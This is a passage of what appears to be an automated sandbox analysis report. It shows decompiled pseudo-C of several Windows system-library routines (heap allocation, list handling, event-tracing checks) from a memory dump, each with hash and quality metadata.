                                                              									_t69 = 0;
                                                              									__eflags = 0;
                                                              									while(1) {
                                                              										 *(_t85 - 0x38) = _t69;
                                                              										__eflags = _t69 -  *0x4c884c0;
                                                              										if(_t69 >=  *0x4c884c0) {
                                                              											break;
                                                              										}
                                                              										__eflags = _t63;
                                                              										if(_t63 != 0) {
                                                              											break;
                                                              										}
                                                              										_t66 = E04C69063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                              										__eflags = _t66;
                                                              										if(_t66 == 0) {
                                                              											_t63 = 0;
                                                              											__eflags = 0;
                                                              										} else {
                                                              											_t63 = _t66 + 0xfffffff4;
                                                              										}
                                                              										 *(_t85 - 0x34) = _t63;
                                                              										_t69 = _t69 + 1;
                                                              									}
                                                              									_t84 = _t84 + 1;
                                                              								}
                                                              								__eflags = _t63;
                                                              							}
                                                              							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                              							 *((char*)(_t82 + 0xe5)) = 1;
                                                              							 *((char*)(_t85 - 0x1d)) = 1;
                                                              							L12:
                                                              							 *(_t85 - 4) = 0xfffffffe;
                                                              							E04B9922A(_t82);
                                                              							_t53 = E04BB7D50();
                                                              							__eflags = _t53;
                                                              							if(_t53 != 0) {
                                                              								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              							} else {
                                                              								_t56 = 0x7ffe0386;
                                                              							}
                                                              							__eflags =  *_t56;
                                                              							if( *_t56 != 0) {
                                                              								_t56 = E04C68B58(_t82);
                                                              							}
                                                              							__eflags =  *((char*)(_t85 - 0x1d));
                                                              							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                              								__eflags = _t82 -  *0x4c886c0; // 0x2e607b0
                                                              								if(__eflags != 0) {
                                                              									__eflags = _t82 -  *0x4c886b8; // 0x0
                                                              									if(__eflags == 0) {
                                                              										_t79 = 0x4c886bc;
                                                              										_t72 = 0x4c886b8;
                                                              										goto L18;
                                                              									}
                                                              									__eflags = _t56 | 0xffffffff;
                                                              									asm("lock xadd [edi], eax");
                                                              									if(__eflags == 0) {
                                                              										E04B99240(_t68, _t82, _t82, _t84, __eflags);
                                                              									}
                                                              								} else {
                                                              									_t79 = 0x4c886c4;
                                                              									_t72 = 0x4c886c0;
                                                              									L18:
                                                              									E04BC9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                              								}
                                                              							}
                                                              							goto L5;
                                                              						}
                                                              					}
                                                              				}
                                                              			}



















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 87d68eb588c3ad2091b9cdb74ddfd1885e2b9865a0ad5540c4fb9f8b3c7124c2
                                                              • Instruction ID: a382bef9388c46ab40e7a215d6e0d2006e04c45889769509a1a869de9cdb0933
                                                              • Opcode Fuzzy Hash: 87d68eb588c3ad2091b9cdb74ddfd1885e2b9865a0ad5540c4fb9f8b3c7124c2
                                                              • Instruction Fuzzy Hash: BD319CB5A01655AFEF65EF68C488BACB7F1FB48354F1881ADC40567341C334BD908B61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 53%
                                                              			E04BB0050(void* __ecx) {
                                                              				signed int _v8;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				intOrPtr* _t30;
                                                              				intOrPtr* _t31;
                                                              				signed int _t34;
                                                              				void* _t40;
                                                              				void* _t41;
                                                              				signed int _t44;
                                                              				intOrPtr _t47;
                                                              				signed int _t58;
                                                              				void* _t59;
                                                              				void* _t61;
                                                              				void* _t62;
                                                              				signed int _t64;
                                                              
                                                              				_push(__ecx);
                                                              				_v8 =  *0x4c8d360 ^ _t64;
                                                              				_t61 = __ecx;
                                                              				_t2 = _t61 + 0x20; // 0x20
                                                              				E04BC9ED0(_t2, 1, 0);
                                                              				_t52 =  *(_t61 + 0x8c);
                                                              				_t4 = _t61 + 0x8c; // 0x8c
                                                              				_t40 = _t4;
                                                              				do {
                                                              					_t44 = _t52;
                                                              					_t58 = _t52 & 0x00000001;
                                                              					_t24 = _t44;
                                                              					asm("lock cmpxchg [ebx], edx");
                                                              					_t52 = _t44;
                                                              				} while (_t52 != _t44);
                                                              				if(_t58 == 0) {
                                                              					L7:
                                                              					_pop(_t59);
                                                              					_pop(_t62);
                                                              					_pop(_t41);
                                                              					return E04BDB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                                              				}
                                                              				asm("lock xadd [esi], eax");
                                                              				_t47 =  *[fs:0x18];
                                                              				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                                              				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                                              				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                              				if(_t30 != 0) {
                                                              					if( *_t30 == 0) {
                                                              						goto L4;
                                                              					}
                                                              					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              					L5:
                                                              					if( *_t31 != 0) {
                                                              						_t18 = _t61 + 0x78; // 0x78
                                                              						E04C68A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                                              					}
                                                              					_t52 =  *(_t61 + 0x5c);
                                                              					_t11 = _t61 + 0x78; // 0x78
                                                              					_t34 = E04BC9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                                              					_t24 = _t34 | 0xffffffff;
                                                              					asm("lock xadd [esi], eax");
                                                              					if((_t34 | 0xffffffff) == 0) {
                                                              						 *0x4c8b1e0(_t61);
                                                              						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                                              					}
                                                              					goto L7;
                                                              				}
                                                              				L4:
                                                              				_t31 = 0x7ffe0386;
                                                              				goto L5;
                                                              			}





















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af1a2b5ff84426b8946da3a7cc785026c510542ecdb64bd6e2567927a98e1995
                                                              • Instruction ID: 4e3b0c1777b198d297521d3fad4caefb5162150f13598d4ac333902198495535
                                                              • Opcode Fuzzy Hash: af1a2b5ff84426b8946da3a7cc785026c510542ecdb64bd6e2567927a98e1995
                                                              • Instruction Fuzzy Hash: D2314B31601A088FD725DF28C844BA7B7E5FB88718F1445ADE99A87690EA75B801DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E04C16C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                                              				signed short* _v8;
                                                              				signed char _v12;
                                                              				void* _t22;
                                                              				signed char* _t23;
                                                              				intOrPtr _t24;
                                                              				signed short* _t44;
                                                              				void* _t47;
                                                              				signed char* _t56;
                                                              				signed char* _t58;
                                                              
                                                              				_t48 = __ecx;
                                                              				_push(__ecx);
                                                              				_push(__ecx);
                                                              				_t44 = __ecx;
                                                              				_v12 = __edx;
                                                              				_v8 = __ecx;
                                                              				_t22 = E04BB7D50();
                                                              				_t58 = 0x7ffe0384;
                                                              				if(_t22 == 0) {
                                                              					_t23 = 0x7ffe0384;
                                                              				} else {
                                                              					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              				}
                                                              				if( *_t23 != 0) {
                                                              					_t24 =  *0x4c87b9c; // 0x0
                                                              					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                                              					_t23 = L04BB4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                                              					_t56 = _t23;
                                                              					if(_t56 != 0) {
                                                              						_t56[0x24] = _a4;
                                                              						_t56[0x28] = _a8;
                                                              						_t56[6] = 0x1420;
                                                              						_t56[0x20] = _v12;
                                                              						_t14 =  &(_t56[0x2c]); // 0x2c
                                                              						E04BDF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                                              						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                                              						if(E04BB7D50() != 0) {
                                                              							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              						}
                                                              						_push(_t56);
                                                              						_push(_t47 - 0x20);
                                                              						_push(0x402);
                                                              						_push( *_t58 & 0x000000ff);
                                                              						E04BD9AE0();
                                                              						_t23 = L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                                              					}
                                                              				}
                                                              				return _t23;
                                                              			}













                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d98a8f7cb26868bb31187d7f95e44bbce2d347af22c24695bb2c18bf743dd61d
                                                              • Instruction ID: b3eb63bd69726c4e1fc235daa4aa2e78a884c78c73aa079ed4bfbf9db77683f4
                                                              • Opcode Fuzzy Hash: d98a8f7cb26868bb31187d7f95e44bbce2d347af22c24695bb2c18bf743dd61d
                                                              • Instruction Fuzzy Hash: 6D219CB1A00644ABD711DB69D840F6AB7A8FF48744F1440A9F805C77A1EA34ED10DBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 82%
                                                              			E04BD90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                              				intOrPtr* _v0;
                                                              				void* _v8;
                                                              				signed int _v12;
                                                              				intOrPtr _v16;
                                                              				char _v36;
                                                              				void* _t38;
                                                              				intOrPtr _t41;
                                                              				void* _t44;
                                                              				signed int _t45;
                                                              				intOrPtr* _t49;
                                                              				signed int _t57;
                                                              				signed int _t58;
                                                              				intOrPtr* _t59;
                                                              				void* _t62;
                                                              				void* _t63;
                                                              				void* _t65;
                                                              				void* _t66;
                                                              				signed int _t69;
                                                              				intOrPtr* _t70;
                                                              				void* _t71;
                                                              				intOrPtr* _t72;
                                                              				intOrPtr* _t73;
                                                              				char _t74;
                                                              
                                                              				_t65 = __edx;
                                                              				_t57 = _a4;
                                                              				_t32 = __ecx;
                                                              				_v8 = __edx;
                                                              				_t3 = _t32 + 0x14c; // 0x14c
                                                              				_t70 = _t3;
                                                              				_v16 = __ecx;
                                                              				_t72 =  *_t70;
                                                              				while(_t72 != _t70) {
                                                              					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                              						L24:
                                                              						_t72 =  *_t72;
                                                              						continue;
                                                              					}
                                                              					_t30 = _t72 + 0x10; // 0x10
                                                              					if(E04BED4F0(_t30, _t65, _t57) == _t57) {
                                                              						return 0xb7;
                                                              					}
                                                              					_t65 = _v8;
                                                              					goto L24;
                                                              				}
                                                              				_t61 = _t57;
                                                              				_push( &_v12);
                                                              				_t66 = 0x10;
                                                              				if(E04BCE5E0(_t57, _t66) < 0) {
                                                              					return 0x216;
                                                              				}
                                                              				_t73 = L04BB4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                                              				if(_t73 == 0) {
                                                              					_t38 = 0xe;
                                                              					return _t38;
                                                              				}
                                                              				_t9 = _t73 + 0x10; // 0x10
                                                              				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                                              				E04BDF3E0(_t9, _v8, _t57);
                                                              				_t41 =  *_t70;
                                                              				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                                              					_t62 = 3;
                                                              					asm("int 0x29");
                                                              					_push(_t62);
                                                              					_push(_t57);
                                                              					_push(_t73);
                                                              					_push(_t70);
                                                              					_t71 = _t62;
                                                              					_t74 = 0;
                                                              					_v36 = 0;
                                                              					_t63 = E04BCA2F0(_t62, _t71, 1, 6,  &_v36);
                                                              					if(_t63 == 0) {
                                                              						L20:
                                                              						_t44 = 0x57;
                                                              						return _t44;
                                                              					}
                                                              					_t45 = _v12;
                                                              					_t58 = 0x1c;
                                                              					if(_t45 < _t58) {
                                                              						goto L20;
                                                              					}
                                                              					_t69 = _t45 / _t58;
                                                              					if(_t69 == 0) {
                                                              						L19:
                                                              						return 0xe8;
                                                              					}
                                                              					_t59 = _v0;
                                                              					do {
                                                              						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                                              							goto L18;
                                                              						}
                                                              						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                                              						 *_t59 = _t49;
                                                              						if( *_t49 != 0x53445352) {
                                                              							goto L18;
                                                              						}
                                                              						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                                              						return 0;
                                                              						L18:
                                                              						_t63 = _t63 + 0x1c;
                                                              						_t74 = _t74 + 1;
                                                              					} while (_t74 < _t69);
                                                              					goto L19;
                                                              				}
                                                              				 *_t73 = _t41;
                                                              				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                                              				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                                              				 *_t70 = _t73;
                                                              				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                                              				return 0;
                                                              			}



























                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                              • Instruction ID: f632020854621b25bcc96ecc254ef51395dd36bca1ccb5964e58fb7e74f4c29b
                                                              • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                              • Instruction Fuzzy Hash: 82219FB1A00605EFDB21DF59C844EAAF7F8EB48714F1488EAE949A7210E774FD10DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 59%
                                                              			E04BC3B7A(void* __ecx) {
                                                              				signed int _v8;
                                                              				char _v12;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _t17;
                                                              				intOrPtr _t26;
                                                              				void* _t35;
                                                              				void* _t38;
                                                              				void* _t41;
                                                              				intOrPtr _t44;
                                                              
                                                              				_t17 =  *0x4c884c4; // 0x0
                                                              				_v12 = 1;
                                                              				_v8 =  *0x4c884c0 * 0x4c;
                                                              				_t41 = __ecx;
                                                              				_t35 = L04BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4c884c0 * 0x4c);
                                                              				if(_t35 == 0) {
                                                              					_t44 = 0xc0000017;
                                                              				} else {
                                                              					_push( &_v8);
                                                              					_push(_v8);
                                                              					_push(_t35);
                                                              					_push(4);
                                                              					_push( &_v12);
                                                              					_push(0x6b);
                                                              					_t44 = E04BDAA90();
                                                              					_v20 = _t44;
                                                              					if(_t44 >= 0) {
                                                              						E04BDFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4c884c0 * 0xc);
                                                              						_t38 = _t35;
                                                              						if(_t35 < _v8 + _t35) {
                                                              							do {
                                                              								asm("movsd");
                                                              								asm("movsd");
                                                              								asm("movsd");
                                                              								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                                              							} while (_t38 < _v8 + _t35);
                                                              							_t44 = _v20;
                                                              						}
                                                              					}
                                                              					_t26 =  *0x4c884c4; // 0x0
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                                              				}
                                                              				return _t44;
                                                              			}













                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 80%
                                                              			E04C16CF0(void* __edx, intOrPtr _a4, short _a8) {
                                                              				char _v8;
                                                              				char _v12;
                                                              				char _v16;
                                                              				char _v20;
                                                              				char _v28;
                                                              				char _v36;
                                                              				char _v52;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				signed char* _t21;
                                                              				void* _t24;
                                                              				void* _t36;
                                                              				void* _t38;
                                                              				void* _t46;
                                                              
                                                              				_push(_t36);
                                                              				_t46 = __edx;
                                                              				_v12 = 0;
                                                              				_v8 = 0;
                                                              				_v20 = 0;
                                                              				_v16 = 0;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t21 = 0x7ffe0384;
                                                              				} else {
                                                              					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                                              				}
                                                              				if( *_t21 != 0) {
                                                              					_t21 =  *[fs:0x30];
                                                              					if((_t21[0x240] & 0x00000004) != 0) {
                                                              						if(E04BB7D50() == 0) {
                                                              							_t21 = 0x7ffe0385;
                                                              						} else {
                                                              							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                                              						}
                                                              						if(( *_t21 & 0x00000020) != 0) {
                                                              							_t56 = _t46;
                                                              							if(_t46 == 0) {
                                                              								_t46 = 0x4b75c80;
                                                              							}
                                                              							_push(_t46);
                                                              							_push( &_v12);
                                                              							_t24 = E04BCF6E0(_t36, 0, _t46, _t56);
                                                              							_push(_a4);
                                                              							_t38 = _t24;
                                                              							_push( &_v28);
                                                              							_t21 = E04BCF6E0(_t38, 0, _t46, _t56);
                                                              							if(_t38 != 0) {
                                                              								if(_t21 != 0) {
                                                              									E04C17016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                                              									L04BB2400( &_v52);
                                                              								}
                                                              								_t21 = L04BB2400( &_v28);
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t21;
                                                              			}




















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E04C6070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                              				char _v8;
                                                              				intOrPtr _v11;
                                                              				signed int _v12;
                                                              				intOrPtr _v15;
                                                              				signed int _v16;
                                                              				intOrPtr _v28;
                                                              				void* __ebx;
                                                              				char* _t32;
                                                              				signed int* _t38;
                                                              				signed int _t60;
                                                              
                                                              				_t38 = __ecx;
                                                              				_v16 = __edx;
                                                              				_t60 = E04C607DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                                              				if(_t60 != 0) {
                                                              					_t7 = _t38 + 0x38; // 0x29cd5903
                                                              					_push( *_t7);
                                                              					_t9 = _t38 + 0x34; // 0x6adeeb00
                                                              					_push( *_t9);
                                                              					_v12 = _a8 << 0xc;
                                                              					_t11 = _t38 + 4; // 0x5de58b5b
                                                              					_push(0x4000);
                                                              					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                                              					E04C5AFDE( &_v8,  &_v12);
                                                              					E04C61293(_t38, _v28, _t60);
                                                              					if(E04BB7D50() == 0) {
                                                              						_t32 = 0x7ffe0380;
                                                              					} else {
                                                              						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                              					}
                                                              					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                              						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                                              						E04C514FB(_t38,  *_t21, _v11, _v15, 0xd);
                                                              					}
                                                              				}
                                                              				return  ~_t60;
                                                              			}














                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 96%
                                                              			E04BBAE73(intOrPtr __ecx, void* __edx) {
                                                              				intOrPtr _v8;
                                                              				void* _t19;
                                                              				char* _t22;
                                                              				signed char* _t24;
                                                              				intOrPtr _t25;
                                                              				intOrPtr _t27;
                                                              				void* _t31;
                                                              				intOrPtr _t36;
                                                              				char* _t38;
                                                              				signed char* _t42;
                                                              
                                                              				_push(__ecx);
                                                              				_t31 = __edx;
                                                              				_v8 = __ecx;
                                                              				_t19 = E04BB7D50();
                                                              				_t38 = 0x7ffe0384;
                                                              				if(_t19 != 0) {
                                                              					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              				} else {
                                                              					_t22 = 0x7ffe0384;
                                                              				}
                                                              				_t42 = 0x7ffe0385;
                                                              				if( *_t22 != 0) {
                                                              					if(E04BB7D50() == 0) {
                                                              						_t24 = 0x7ffe0385;
                                                              					} else {
                                                              						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                              					}
                                                              					if(( *_t24 & 0x00000010) != 0) {
                                                              						goto L17;
                                                              					} else {
                                                              						goto L3;
                                                              					}
                                                              				} else {
                                                              					L3:
                                                              					_t27 = E04BB7D50();
                                                              					if(_t27 != 0) {
                                                              						_t27 =  *[fs:0x30];
                                                              						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                                              					}
                                                              					if( *_t38 != 0) {
                                                              						_t27 =  *[fs:0x30];
                                                              						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                                              							goto L5;
                                                              						}
                                                              						_t27 = E04BB7D50();
                                                              						if(_t27 != 0) {
                                                              							_t27 =  *[fs:0x30];
                                                              							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                                              						}
                                                              						if(( *_t42 & 0x00000020) != 0) {
                                                              							L17:
                                                              							_t25 = _v8;
                                                              							_t36 = 0;
                                                              							if(_t25 != 0) {
                                                              								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                                              							}
                                                              							_t27 = E04C17794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                                              						}
                                                              						goto L5;
                                                              					} else {
                                                              						L5:
                                                              						return _t27;
                                                              					}
                                                              				}
                                                              			}














                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 82%
                                                              			E04C17794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                              				intOrPtr _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _t21;
                                                              				void* _t24;
                                                              				intOrPtr _t25;
                                                              				void* _t36;
                                                              				short _t39;
                                                              				signed char* _t42;
                                                              				unsigned int _t46;
                                                              				void* _t50;
                                                              
                                                              				_push(__ecx);
                                                              				_push(__ecx);
                                                              				_t21 =  *0x4c87b9c; // 0x0
                                                              				_t46 = _a8;
                                                              				_v12 = __edx;
                                                              				_v8 = __ecx;
                                                              				_t4 = _t46 + 0x2e; // 0x2e
                                                              				_t36 = _t4;
                                                              				_t24 = L04BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                                              				_t50 = _t24;
                                                              				if(_t50 != 0) {
                                                              					_t25 = _a4;
                                                              					if(_t25 == 5) {
                                                              						L3:
                                                              						_t39 = 0x14b1;
                                                              					} else {
                                                              						_t39 = 0x14b0;
                                                              						if(_t25 == 6) {
                                                              							goto L3;
                                                              						}
                                                              					}
                                                              					 *((short*)(_t50 + 6)) = _t39;
                                                              					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                                              					_t11 = _t50 + 0x2c; // 0x2c
                                                              					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                                              					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                                              					E04BDF3E0(_t11, _a12, _t46);
                                                              					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                                              					if(E04BB7D50() == 0) {
                                                              						_t42 = 0x7ffe0384;
                                                              					} else {
                                                              						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              					}
                                                              					_push(_t50);
                                                              					_t19 = _t36 - 0x20; // 0xe
                                                              					_push(0x403);
                                                              					_push( *_t42 & 0x000000ff);
                                                              					E04BD9AE0();
                                                              					_t24 = L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                                              				}
                                                              				return _t24;
                                                              			}














                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c38ea8c9fa61f9a0625e38e39b20097de7df7c48e9092beea0ce8b3d61337b70
                                                              • Instruction ID: 3d2c9e87dd089617aef6cfecb9971ae1a56452b8932127d550bd04a762cdf5c4
                                                              • Opcode Fuzzy Hash: c38ea8c9fa61f9a0625e38e39b20097de7df7c48e9092beea0ce8b3d61337b70
                                                              • Instruction Fuzzy Hash: BA21A172901604ABD725DF69DC80EABB7A9EF89340F1045ADF50AD7760EA34EA00CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E04BCFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				intOrPtr _v8;
                                                              				void* _t19;
                                                              				intOrPtr _t29;
                                                              				intOrPtr _t32;
                                                              				intOrPtr _t35;
                                                              				intOrPtr _t37;
                                                              				intOrPtr* _t40;
                                                              
                                                              				_t35 = __edx;
                                                              				_push(__ecx);
                                                              				_push(__ecx);
                                                              				_t37 = 0;
                                                              				_v8 = __edx;
                                                              				_t29 = __ecx;
                                                              				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                                              					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                                              					L3:
                                                              					_t19 = _a4 - 4;
                                                              					if(_t19 != 0) {
                                                              						if(_t19 != 1) {
                                                              							L7:
                                                              							return _t37;
                                                              						}
                                                              						if(_t35 == 0) {
                                                              							L11:
                                                              							_t37 = 0xc000000d;
                                                              							goto L7;
                                                              						}
                                                              						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                                              							_t35 = _v8;
                                                              						}
                                                              						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                                              						goto L7;
                                                              					}
                                                              					if(_t29 == 0) {
                                                              						goto L11;
                                                              					}
                                                              					_t32 =  *_t40;
                                                              					if(_t32 != 0) {
                                                              						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                                              						E04BA76E2( *_t40);
                                                              					}
                                                              					 *_t40 = _t29;
                                                              					goto L7;
                                                              				}
                                                              				_t40 = L04BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                                              				if(_t40 == 0) {
                                                              					_t37 = 0xc0000017;
                                                              					goto L7;
                                                              				}
                                                              				_t35 = _v8;
                                                              				 *_t40 = 0;
                                                              				 *((intOrPtr*)(_t40 + 4)) = 0;
                                                              				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                                              				goto L3;
                                                              			}











                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
